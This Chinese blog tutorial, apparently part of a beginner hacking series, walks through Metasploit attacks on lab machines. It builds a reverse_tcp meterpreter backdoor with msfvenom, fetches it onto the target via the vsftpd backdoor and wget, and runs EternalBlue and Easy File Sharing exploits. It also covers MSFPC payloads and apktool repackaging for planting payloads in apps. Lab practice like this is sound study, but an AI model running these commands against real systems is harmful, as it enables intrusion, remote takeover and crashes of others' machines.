首页 > 编程语言 >黑客玩具入门——5、继续Metasploit

黑客玩具入门——5、继续Metasploit

时间:2023-11-30 19:12:52浏览次数:47  
标签:Metasploit set 入门 ip xxx elf tcp 黑客 payload

1、利用FTP漏洞并植入后门

实验靶机:Metasploitable2。

实践:

  1. 使用nmap扫描目标靶机
    1. nmap -sV xxx.xxx.xxx.xxx(目标ip)
  2. 生成linux系统后门
    1. msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx(主控端ip) LPORT=5555 -f elf -o /home/xxxx(用户名)/backdoor.elf
  3. 使用Apache服务在目标主机上下载后门
    1. sudo service apache2 start
    2. sudo cp home/xxxx(用户名)/backdoor.elf /var/www/html/
  4. 在主控端浏览器打开apache服务的ip地址,然后右键elf文件,选择Copy Link Location。
  5. 手工激活ftp后门。登录名:user:)。密码:pass
    1. 在主控端命令行输入:ftp xxx.xxx.xxx.xxx(靶机ip)。
    2. 输入登录名密码即可。
    3. 可以通过:nc xxx.xxx.xxx.xxx(靶机ip)。尝试判断是否启用成功。
  6. 然后在nc的命令行中执行下面的命令,这个地址就是你之前右键复制的那个地址。
    1. wget http://192.168.10.129/backdoor.elf
    2. 然后可以通过 cd / --> ls命令。看有没有这个文件。
  7. 然后,启用主控端。打开Metasploit,就跟之前一样。
    1. use exploit/multi/handler
    2. set payload linux/x86/meterpreter/reverse_tcp
    3. set lhost xxx.xxx.xxx.xxx(主控端ip)
    4. set lport 5555
    5. run
  8. 在目标主机上运行后门。以下命令在nc的命令行中操作:
    1. ./backdoor.elf。你会发现权限不足。
    2. chmod 7777 ./backdoor.elf。
    3. 然后再执行就可以了:./backdoor.elf。
  9. 然后,你就可以在meterpreter中为所欲为了。

2、常用攻击软件

由于Windows7使用了比较安全的机制,所以入侵win7远比入侵Windows xp要难得多。虽然系统本身很安全,但是我们不可能只安装一个系统,就什么都没有了,系统内我们还会安装很多软件,我们就可以从这些应用软件入手,去寻找他们的漏洞,借助这些软件做跳板,去入侵系统。

之前我们使用的是python脚本去攻击Easy File Sharing软件,使软件卡死。并成功在目标计算机上打开了计算器,这回我们使用Metasploit来攻击这个应用程序。

实验靶机:Windows7。

实践:

  1. search easyfilesharing。
  2. use exploit/windows/http/easyfilesharing_seh。
  3. set rhost xxx.xxx.xxx.xxx(目标ip)。
  4. set lport 6666。
  5. run。
  6. execute -f calc.exe。打开计算器。

3、攻击Windows7系统蓝屏

实验靶机:Windows7。

实践:

  1. search ms17-010。
  2. use exploit/windows/smb/ms17_010_eternalblue。
  3. set rhost xxx.xxx.xxx.xxx(目标ip)。
  4. set lport 6666。
  5. set payload windows/meterpreter/reverse_tcp。
  6. run。
  7. 然后Windows就蓝屏了。

4、漏洞利用工具集:MSFPC

生成payload的默认工具是MSFvenom,这是一个独立于Metasploit的payload生成器及编辑器。虽然它是一个非常强的payload生成神器,但是对于一个新手来说,可能难以在短时间内熟悉其操作。即使在进程最初的了解之后,生成一个基本的payload也需要输入相当多的内容。

MSFPC,或者说是MSFvenom Payload生成器,其实是一个基于MSFvenom的payload生成器,它简化了基本的有效载荷创建过程,用户使用MSFPC可以尽可能简单的创建Payload。

使用方法:

  1. 漏洞利用工具集 --> msf payload creator --> 打开他。
  2. sudo msfpc windows xxx.xxx.xxx.xxx(当前主机ip) 6666。
  3. 然后会生成这么多东西:

      

  4. 其实就是把我们之前通过手动配置的东西都自动生成了。包括可执行文件、命令脚本等。我们看下如何来使用这些东西
    1. sudo service apache2 start。
    2. 跟之前一样,把刚才生成的可执行文件复制到Apache目录下。这里不写了。
    3. msfconsole -q -r [上面生成的那个.rc文件地址]
    4. 查看session
    5. 使用session。
    6. 成功!

5、Payload 介绍

病毒通常会做一些有害的或者恶意的动作。在病毒代码中实现这个功能的部分叫做“有效载荷(Payload)”。Payload可以实现任何运行在受害者环境中的程序所能做的事情。并且能够执行动作包括破坏文件、删除文件、向病毒的作者或者任意的接收者发送敏感信息,以及提供通向被感染计算机的后门。

Payloads模块,也叫有效载荷或有效负载,也就是我们常说的shellcode。在MSF中为我们提供了大量的Payloads。我们可以再MSF中通过show payloads命令查看。

payloads模块的命名规则

操作系统/类型/模块名称:windows/shell/bind_tcp。

  1. shell_find_taf:在一个已建立的链接上创建一个shell
  2. shell_reverse_tcp:反向链接到攻击者主机并创建一个shell
  3. bind_tcp:监听一个tcp链接。
  4. reverse_tcp:反向建立tcp链接。
  5. add_user:创建一个新用户并添加到管理组。

payloads模块等级

等级代表好用程度,一般分为以下几个等级:

  1. normal:正常
  2. excellent:优秀
  3. great:极好
  4. good:好
  5. average:一般、平均
  6. manual:手动

查看payloads下的某个模块的详细信息

  1. info [模块名]
    • info windows/shell/bind_tcp

6、apk文件的反编译

1)什么是逆向工程?反编译?

就是将已有的APP程序,反向操作,方便我们查看里面的原始文件,因为我们平时拿到的APP程序都是经过加密处理的。

2)反编译有什么用?

可以用来分析APP,比如获取IP地址。将payload植入其他APP等等。

3)APK反编译软件——apktool

  1. 反编译apk文件
  2. apktool d xxx.apk
  3. 将反编译后的文件重新打包
  4. apktool b xxx.apk

标签:Metasploit,set,入门,ip,xxx,elf,tcp,黑客,payload
From: https://www.cnblogs.com/zaking/p/17864918.html

相关文章

  • Halcon使用入门
      使用WPF并采取MVVM模式MVVM相关      添加引用Halcon:  XAML设计:<Grid><Grid.RowDefinitions><RowDefinitionHeight="0.8*"/><RowDefinitionHeight="0.2*"/></Grid.RowDefinitions><Hal......
  • 面向对象---入门级(最基础的部分)python
    #面向对象---入门#思想或者宗旨:抽象、封装、继承、多态#完成对一个类的创建,(先抽象)(类名一般大写)classStudent:name=""age=""sex=""score=""#访问类里的元素name="李四"Student.name="张三"print(Student.name)print(name)#name=“......
  • XmlRPC入门_组合类型操作
    1、数组操作#include<iostream>#include<winsock2.h>#include<windows.h>#include<xmlrpc-c/base.hpp>#include<xmlrpc-c/registry.hpp>#include<xmlrpc-c/server_abyss.hpp>#include<direct.h>#include<stdio.h&......
  • XmlRPC入门_基本类型操作
    #include<iostream>#include<winsock2.h>#include<windows.h>#include<xmlrpc-c/base.hpp>#include<xmlrpc-c/registry.hpp>#include<xmlrpc-c/server_abyss.hpp>#include<direct.h>#include<stdio.h>#inc......
  • 虚拟机系统安装:从入门到精通
    一、介绍虚拟机系统安装是一种在计算机上模拟另一个操作系统环境的技术。它可以在一台物理计算机上运行多个虚拟机,每个虚拟机都可以拥有独立的操作系统和应用程序。这种技术可以帮助我们测试新软件、运行旧版操作系统,或者在同一台计算机上运行多个操作系统。二、所需工具虚拟......
  • FPGA入门笔记007_A——按键消抖模块设计与验证(状态机、$random、仿真模型、task语法)
    实验现象:每次按下按键0,4个LED显示状态以二进制加法格式加1。每次按下按键1,4个LED显示状态以二进制加法格式减1。知识点:1、testbench中随机数发生函数$random的使用;2、仿真模型的概念1、按键波形分析:按键未按,FPGA管脚检测到高电平。按键按下,FPGA管脚检测到低电平。2、设......
  • XmlRPC入门_形参定义
    形参类型的定义略Thestringlookssomethinglikethisexample:i:iii,s:.Itisalistofsignaturestrings,separatedbycommas.Intheexample,therearetwosignatures:i:iiis:Eachsignaturestringdescribesoneformofcallingthemethod.Asignatures......
  • 神经网络入门篇:详解深层网络中的前向传播(Forward propagation in a Deep Network)
    深层网络中的前向传播先说对其中一个训练样本\(x\)如何应用前向传播,之后讨论向量化的版本。第一层需要计算\({{z}^{[1]}}={{w}^{[1]}}x+{{b}^{[1]}}\),\({{a}^{[1]}}={{g}^{[1]}}{({z}^{[1]})}\)(\(x\)可以看做\({{a}^{[0]}}\))第二层需要计算\({{z}^{[2]}}={{w}^{[2]}}{{a}^{[......
  • 黑客玩具入门——2、Kali常用命令与简单工具
    一、Linux常用命令首先,我们启动kali系统,然后点击这里的命令行工具。就可以使用下面学习的命令了,另外,如果你有过计算机基础,那么Mac的terminal和Git的gitbash,都是可以练习大部分的linux命令的。下面我们就学习一些入门的基础命令sudo,系统管理者的身份执行指令,也就是说,经由sudo......
  • 【Python入门教程】Python的shutil库介绍+基础函数使用(文件/目录复制、移动、删除、解
    ​前言        很多时候编过的代码过段时间就忘了,所以想用博文记录一下一些平时常用库的函数,今天跟大家分享一下python的shutil库的常用函数,包括文件复制、删除、移动等常见操作。同时为了复习之前python类的使用,所以今天的代码就用类封装起来了,大家直接看函数就行,不需......